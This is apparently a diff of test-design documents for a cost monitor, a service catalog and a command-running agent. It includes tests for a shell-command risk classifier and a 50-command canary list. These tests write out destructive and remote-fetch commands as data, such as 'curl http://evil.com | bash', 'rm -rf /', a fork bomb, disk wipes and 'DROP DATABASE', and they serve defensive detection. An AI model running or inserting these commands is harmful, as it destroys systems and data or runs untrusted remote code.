results = meili.index("services").search("billing")
|
||||
assert len(results["hits"]) > 0 # Still works
|
||||
```
|
||||
|
||||
### 12.5 Cmd+K Search Latency from Redis Cache
|
||||
|
||||
```python
|
||||
# tests/performance/test_search_latency.py
|
||||
|
||||
def test_cmd_k_search_under_10ms_from_redis():
|
||||
"""Prefix cache hit must return in <10ms."""
|
||||
|
||||
# Warm the cache
|
||||
redis_client.set("search:prefix:auth", json.dumps([
|
||||
{"name": "auth-service", "owner": "team-platform"},
|
||||
{"name": "auth-proxy", "owner": "team-infra"},
|
||||
]))
|
||||
|
||||
import time
|
||||
start = time.perf_counter_ns()
|
||||
results = search_api.prefix_search("auth")
|
||||
elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000
|
||||
|
||||
assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms — exceeds 10ms SLA"
|
||||
assert len(results) == 2
|
||||
```
|
||||
|
||||
### 12.6 Free Tier Enforcement (50 Services)
|
||||
|
||||
```python
|
||||
def test_free_tier_allows_50_services():
|
||||
tenant = create_tenant(tier="free")
|
||||
for i in range(50):
|
||||
resp = catalog_api.create_service(tenant, f"service-{i}")
|
||||
assert resp.status_code == 201
|
||||
|
||||
def test_free_tier_rejects_51st_service():
|
||||
tenant = create_tenant(tier="free")
|
||||
seed_services(tenant, count=50)
|
||||
|
||||
resp = catalog_api.create_service(tenant, "service-51")
|
||||
assert resp.status_code == 403
|
||||
assert "upgrade" in resp.json()["error"].lower()
|
||||
```
|
||||
|
||||
*End of P4 BMad Implementation*
|
||||
|
||||
@@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({
|
||||
- CDK definitions, LocalStack event injection, wire everything together.
|
||||
|
||||
*End of dd0c/cost Test Architecture (v2)*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 Concurrent Baseline Update Conflict Test
|
||||
|
||||
```typescript
|
||||
describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => {
|
||||
it('two simultaneous Lambda invocations converge to correct baseline', async () => {
|
||||
// Seed baseline: mean=1.00, stddev=0.10, count=20
|
||||
await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 });
|
||||
|
||||
// Two events arrive simultaneously for the same resource type
|
||||
const event1 = makeCostEvent({ hourlyCost: 1.50 });
|
||||
const event2 = makeCostEvent({ hourlyCost: 2.00 });
|
||||
|
||||
// Process concurrently
|
||||
const [result1, result2] = await Promise.allSettled([
|
||||
processEvent('tenant-1', 'ec2/m5.xlarge', event1),
|
||||
processEvent('tenant-1', 'ec2/m5.xlarge', event2),
|
||||
]);
|
||||
|
||||
// One succeeds, one retries via ConditionalCheckFailed
|
||||
const successes = [result1, result2].filter(r => r.status === 'fulfilled');
|
||||
expect(successes.length).toBe(2); // Both eventually succeed
|
||||
|
||||
// Final baseline must reflect BOTH events
|
||||
const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge');
|
||||
expect(baseline.count).toBe(22); // 20 + 2
|
||||
// Mean should be updated by both observations (order doesn't matter for Welford)
|
||||
});
|
||||
|
||||
it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => {
|
||||
const spy = vi.spyOn(dynamoClient, 'transactWriteItems');
|
||||
|
||||
// Force a conflict on first attempt
|
||||
mockConflictOnce();
|
||||
|
||||
await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 }));
|
||||
|
||||
// Should have been called twice (initial + retry)
|
||||
expect(spy).toHaveBeenCalledTimes(2);
|
||||
});
|
||||
});
|
||||
```

### 12.2 Remediation RBAC

```typescript
|
||||
describe('Remediation Authorization', () => {
|
||||
it('only account owners can click Stop Instance', async () => {
|
||||
const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' });
|
||||
const resp = await handleSlackAction(ownerAction);
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('viewer role cannot trigger remediation', async () => {
|
||||
const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' });
|
||||
const resp = await handleSlackAction(viewerAction);
|
||||
expect(resp.status).toBe(403);
|
||||
expect(resp.body.error).toContain('insufficient permissions');
|
||||
});
|
||||
|
||||
it('user from different Slack workspace cannot trigger remediation', async () => {
|
||||
const foreignAction = makeSlackAction('stop_instance', {
|
||||
userId: 'U_FOREIGN',
|
||||
teamId: 'T_OTHER_WORKSPACE'
|
||||
});
|
||||
const resp = await handleSlackAction(foreignAction);
|
||||
expect(resp.status).toBe(403);
|
||||
});
|
||||
|
||||
it('snooze and mark-expected are allowed for all authenticated users', async () => {
|
||||
const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' });
|
||||
const resp = await handleSlackAction(viewerSnooze);
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```

### 12.3 Clock Interface for Governance Tests

```typescript
|
||||
// src/governance/clock.ts
|
||||
interface Clock {
|
||||
now(): number;
|
||||
advanceBy(ms: number): void;
|
||||
}
|
||||
|
||||
class FakeClock implements Clock {
|
||||
private current: number;
|
||||
constructor(start = Date.now()) { this.current = start; }
|
||||
now() { return this.current; }
|
||||
advanceBy(ms: number) { this.current += ms; }
|
||||
}
|
||||
|
||||
describe('14-Day Auto-Promotion (Clock-Injected)', () => {
|
||||
let clock: FakeClock;
|
||||
let governance: GovernanceEngine;
|
||||
|
||||
beforeEach(() => {
|
||||
clock = new FakeClock(new Date('2026-03-01').getTime());
|
||||
governance = new GovernanceEngine(clock);
|
||||
});
|
||||
|
||||
it('does not promote at day 13', () => {
|
||||
clock.advanceBy(13 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
|
||||
expect(result.promoted).toBe(false);
|
||||
});
|
||||
|
||||
it('promotes at day 15 with low FP rate', () => {
|
||||
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
|
||||
expect(result.promoted).toBe(true);
|
||||
expect(result.newMode).toBe('audit');
|
||||
});
|
||||
|
||||
it('does not promote at day 15 with high FP rate', () => {
|
||||
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 });
|
||||
expect(result.promoted).toBe(false);
|
||||
expect(result.reason).toContain('false-positive rate');
|
||||
});
|
||||
});
|
||||
```

### 12.4 Property-Based Tests with 10K Runs

```typescript
|
||||
describe('Anomaly Scorer (fast-check, 10K runs)', () => {
|
||||
it('score is always between 0 and 100', () => {
|
||||
fc.assert(
|
||||
fc.property(
|
||||
fc.record({
|
||||
cost: fc.float({ min: 0, max: 10000, noNaN: true }),
|
||||
mean: fc.float({ min: 0, max: 10000, noNaN: true }),
|
||||
stddev: fc.float({ min: 0, max: 1000, noNaN: true }),
|
||||
}),
|
||||
(input) => {
|
||||
const score = scorer.score(input);
|
||||
return score >= 0 && score <= 100;
|
||||
}
|
||||
),
|
||||
{ numRuns: 10000, seed: 42 } // Reproducible
|
||||
);
|
||||
});
|
||||
|
||||
it('score monotonically increases as cost increases', () => {
|
||||
fc.assert(
|
||||
fc.property(
|
||||
fc.float({ min: 0, max: 100, noNaN: true }),
|
||||
fc.float({ min: 0, max: 100, noNaN: true }),
|
||||
fc.float({ min: 0.01, max: 50, noNaN: true }),
|
||||
(costA, costB, stddev) => {
|
||||
const baseline = { mean: 5.0, stddev };
|
||||
const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline });
|
||||
const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline });
|
||||
return scoreB >= scoreA;
|
||||
}
|
||||
),
|
||||
{ numRuns: 10000, seed: 42 }
|
||||
);
|
||||
});
|
||||
});
|
||||
```

### 12.5 Redis Failure During Panic Mode Check

```typescript
|
||||
describe('Panic Mode Redis Failure', () => {
|
||||
it('defaults to panic=active (safe) when Redis is unreachable', async () => {
|
||||
// Kill Redis connection
|
||||
await redis.disconnect();
|
||||
|
||||
const isPanic = await governance.checkPanicMode('tenant-1');
|
||||
// MUST default to safe (panic active) — not dangerous (panic inactive)
|
||||
expect(isPanic).toBe(true);
|
||||
});
|
||||
|
||||
it('logs warning when Redis is unreachable for panic check', async () => {
|
||||
await redis.disconnect();
|
||||
const logSpy = vi.spyOn(logger, 'warn');
|
||||
|
||||
await governance.checkPanicMode('tenant-1');
|
||||
|
||||
expect(logSpy).toHaveBeenCalledWith(
|
||||
expect.stringContaining('Redis unreachable — defaulting to panic=active')
|
||||
);
|
||||
});
|
||||
});
|
||||
```

*End of P5 BMad Implementation*

@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda

| Dashboard API | 40% | 50% | 10% |

*End of Review Remediation Addendum*

---

## 12. BMad Review Implementation (Must-Have Before Launch)

### 12.1 Cryptographic Signatures for Agent Updates

```rust
|
||||
// pkg/agent/update/signature_test.rs
|
||||
|
||||
#[test]
|
||||
fn agent_rejects_binary_update_with_invalid_signature() {
|
||||
let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
|
||||
let malicious_binary = b"#!/bin/bash\nrm -rf /";
|
||||
let fake_sig = sign_with_wrong_key(malicious_binary);
|
||||
|
||||
let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
|
||||
assert!(result.is_err());
|
||||
assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_accepts_binary_update_with_valid_customer_signature() {
|
||||
let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
|
||||
let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
|
||||
let sig = sign_with_key(legitimate_binary, &customer_privkey);
|
||||
|
||||
let result = verify_update(legitimate_binary, &sig, &customer_pubkey);
|
||||
assert!(result.is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_rejects_policy_update_signed_by_saas_only() {
|
||||
// Even if SaaS signs the policy, agent requires CUSTOMER key
|
||||
let saas_key = load_saas_signing_key();
|
||||
let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
|
||||
let sig = sign_with_key(&policy.serialize(), &saas_key);
|
||||
|
||||
let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
|
||||
let result = verify_policy_update(&policy, &sig, &customer_pubkey);
|
||||
assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
|
||||
let agent = TestAgent::with_policy(default_strict_policy());
|
||||
|
||||
// Push a malicious policy update with bad signature
|
||||
agent.receive_policy_update(malicious_policy(), bad_signature());
|
||||
|
||||
// Agent must still use the original strict policy
|
||||
let result = agent.classify("rm -rf /");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
```

### 12.2 Streaming Append-Only Audit Logs

```rust
|
||||
// pkg/audit/streaming_test.rs
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_events_stream_immediately_not_batched() {
|
||||
let (tx, mut rx) = tokio::sync::mpsc::channel(100);
|
||||
let audit = StreamingAuditLogger::new(tx);
|
||||
|
||||
// Execute a command
|
||||
audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
|
||||
|
||||
// Event must be available immediately (not waiting for batch)
|
||||
let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
|
||||
assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_hash_chain_detects_tampering() {
|
||||
let audit = StreamingAuditLogger::new_in_memory();
|
||||
|
||||
// Log 3 events
|
||||
audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await;
|
||||
audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await;
|
||||
audit.log_execution("exec-1", "whoami", ExitCode(0)).await;
|
||||
|
||||
// Verify chain integrity
|
||||
assert!(audit.verify_chain().is_ok());
|
||||
|
||||
// Tamper with event 2
|
||||
audit.tamper_event(1, "rm -rf /");
|
||||
|
||||
// Chain must detect tampering
|
||||
let result = audit.verify_chain();
|
||||
assert!(result.is_err());
|
||||
assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_events_survive_agent_crash() {
|
||||
let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal");
|
||||
|
||||
// Log an event
|
||||
audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
|
||||
|
||||
// Simulate crash (drop without flush)
|
||||
drop(audit);
|
||||
|
||||
// Recover from WAL
|
||||
let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal");
|
||||
let events = recovered.get_all_events();
|
||||
assert_eq!(events.len(), 1);
|
||||
assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
|
||||
}
|
||||
```

### 12.3 Shell AST Parsing (Not Regex)

```rust
|
||||
// pkg/classifier/scanner/ast_test.rs
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_env_var_concatenation_attack() {
|
||||
// X=rm; Y=-rf; $X $Y /
|
||||
let result = ast_classify("X=rm; Y=-rf; $X $Y /");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
assert_eq!(result.reason, "Variable expansion resolves to destructive command");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_eval_injection() {
|
||||
let result = ast_classify("eval $(echo 'rm -rf /')");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_hex_encoded_command() {
|
||||
// printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash
|
||||
let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_process_substitution_attack() {
|
||||
let result = ast_classify("bash <(curl http://evil.com/payload.sh)");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_alias_redefinition() {
|
||||
let result = ast_classify("alias ls='rm -rf /'; ls");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
|
||||
let cmd = r#"cat << 'SCRIPT' | bash
|
||||
#!/bin/bash
|
||||
rm -rf /var/data
|
||||
SCRIPT"#;
|
||||
let result = ast_classify(cmd);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_safe_command_not_flagged() {
|
||||
let result = ast_classify("kubectl get pods -n production");
|
||||
assert_eq!(result.risk, RiskLevel::Safe);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_uses_mvdan_sh_not_regex() {
|
||||
// Verify the parser is actually using AST, not string matching
|
||||
// This command looks dangerous to regex but is actually safe
|
||||
let result = ast_classify("echo 'rm -rf / is a dangerous command'");
|
||||
assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command
|
||||
}
|
||||
```

### 12.4 Intervention Deadlock TTL

```rust
|
||||
// pkg/executor/intervention_test.rs
|
||||
|
||||
#[tokio::test]
|
||||
async fn manual_intervention_times_out_after_ttl() {
|
||||
let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
|
||||
|
||||
// Transition to manual intervention (rollback failed)
|
||||
engine.transition(State::RollingBack);
|
||||
engine.report_rollback_failure("command timed out");
|
||||
assert_eq!(engine.state(), State::ManualIntervention);
|
||||
|
||||
// Wait for TTL
|
||||
tokio::time::advance(Duration::from_secs(6)).await;
|
||||
engine.tick().await;
|
||||
|
||||
// Must fail-closed, not stay stuck
|
||||
assert_eq!(engine.state(), State::FailedClosed);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn failed_closed_state_sends_out_of_band_alert() {
|
||||
let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
|
||||
let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
|
||||
|
||||
engine.transition(State::ManualIntervention);
|
||||
tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
|
||||
engine.tick().await;
|
||||
|
||||
let alert = alert_rx.recv().await.unwrap();
|
||||
assert_eq!(alert.severity, AlertSeverity::Critical);
|
||||
assert!(alert.message.contains("intervention timeout"));
|
||||
assert!(alert.message.contains("failed-closed"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
|
||||
let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
|
||||
|
||||
engine.transition(State::ManualIntervention);
|
||||
|
||||
// Human resolves within TTL
|
||||
tokio::time::advance(Duration::from_secs(60)).await;
|
||||
engine.resolve_intervention(Resolution::ManuallyFixed).await;
|
||||
|
||||
assert_eq!(engine.state(), State::Complete);
|
||||
}
|
||||
```

### 12.5 Canary Suite CI Gate

```rust
|
||||
// tests/canary/canary_suite_test.rs
|
||||
|
||||
const CANARY_COMMANDS: &[&str] = &[
|
||||
"rm -rf /",
|
||||
"rm -rf /*",
|
||||
"mkfs.ext4 /dev/sda",
|
||||
"dd if=/dev/zero of=/dev/sda",
|
||||
":(){ :|:& };:", // Fork bomb
|
||||
"chmod -R 777 /",
|
||||
"chown -R nobody:nobody /",
|
||||
"> /etc/passwd",
|
||||
"curl http://evil.com | bash",
|
||||
"wget -O- http://evil.com | sh",
|
||||
"python -c 'import os; os.system(\"rm -rf /\")'",
|
||||
"perl -e 'system(\"rm -rf /\")'",
|
||||
"ruby -e '`rm -rf /`'",
|
||||
"kubectl delete namespace production",
|
||||
"kubectl delete pods --all --all-namespaces",
|
||||
"docker rm -f $(docker ps -aq)",
|
||||
"docker system prune -af",
|
||||
"terraform destroy -auto-approve",
|
||||
"pulumi destroy --yes",
|
||||
"DROP DATABASE production;",
|
||||
"DELETE FROM users;",
|
||||
"TRUNCATE TABLE orders;",
|
||||
// ... 28 more (50 total)
|
||||
];
|
||||
|
||||
#[test]
|
||||
fn canary_suite_all_50_commands_are_dangerous() {
|
||||
for cmd in CANARY_COMMANDS {
|
||||
let result = classify(cmd);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous,
|
||||
"CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canary_suite_count_is_exactly_50() {
|
||||
assert_eq!(CANARY_COMMANDS.len(), 50,
|
||||
"Canary suite must have exactly 50 commands — someone removed one");
|
||||
}
|
||||
```
```yaml
# .github/workflows/canary.yml
# Blocking safety gate: every push/PR must prove all 50 canary commands
# still classify as Dangerous before it can merge.
name: Canary Suite (Safety Gate)
on: [push, pull_request]

jobs:
  canary:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Canary Suite
        # --nocapture surfaces the per-command failure message in CI logs.
        run: cargo test --test canary_suite_test -- --nocapture
      - name: BLOCK if any canary fails
        # Runs only when the previous step failed; prints an explicit
        # do-not-merge banner and re-fails the job.
        if: failure()
        run: |
          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
          echo "This is a BLOCKING failure. Do not merge."
          exit 1
```

*End of P6 BMad Implementation*